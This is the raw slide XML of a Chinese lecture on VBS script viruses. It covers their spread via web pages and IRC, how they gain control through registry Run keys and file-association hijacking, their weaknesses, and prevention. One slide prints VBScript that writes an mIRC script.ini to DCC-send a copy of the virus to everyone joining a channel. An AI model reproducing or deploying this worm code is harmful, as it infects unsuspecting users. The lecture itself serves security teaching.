                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>单击按钮，将在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>盘创建文件，并用记事本打开该文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/H1&gt;&lt;br&gt;</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&lt;input type="button" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>" name="btn" onclick="creatObj(); return false"&gt;</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&lt;/body&gt;</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&lt;/html&gt;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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IRC</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>聊天通道传播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="1336040"/>
            <a:ext cx="11438255" cy="4931410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>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Dim mirc, fso </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set fso = CreateObject("Scripting.FileSystemObject")</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set mirc = fso.CreateTextFile("C:\mirc\script.ini")        ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>script.ini</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fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs", True </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将病毒文件备份到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>attachment.vbs</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mirc.WriteLine "[script] "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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mirc.WriteLine "n0 = on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick C:\mirc\attachment.vbs }" </a:t>
            </a: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利用命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/ddc send $nick attachment.vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>给通道中的其他用户传送病毒文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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mirc.Close </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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32770" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972820" y="1796415"/>
            <a:ext cx="8763000" cy="4379913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本病毒如何获得控制权</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cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>修改注册表项</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>WSH.RegWrite(strName, anyValue [,strType])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRP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3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2143125"/>
            <a:ext cx="9677400" cy="4094480"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>通过映射文件执行方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>新欢乐时光将</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的执行方式修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>wscript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>。甚至可以将</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>文件的映射指向病毒代码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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欺骗用户，让用户自己执行</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en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>desktop.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>folder.htt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>互相配合</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34818" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1857375"/>
            <a:ext cx="9677400" cy="4380230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本病毒的弱点 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>绝大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>脚本病毒运行的时候需要用到一个对象：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>FileSystemObject </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>代码是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Windows Script Host</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>来解释执行的</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en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>脚本病毒的运行需要其关联程序</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Wscript.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的支持 </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35842" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2214880"/>
            <a:ext cx="9677400" cy="4022725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>通过网页传播的病毒需要</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的支持</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>传播的病毒需要</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>OE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>的自动发送邮件功能支持，但是绝大部分病毒都是以</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>为主要传播方式的 </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3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1929130"/>
            <a:ext cx="9677400" cy="4308475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如何预防和解除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>脚本病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>禁用文件系统对象</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>FileSystemObject</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="-윤고딕120"/>
            </a:pPr>
            <a:r>
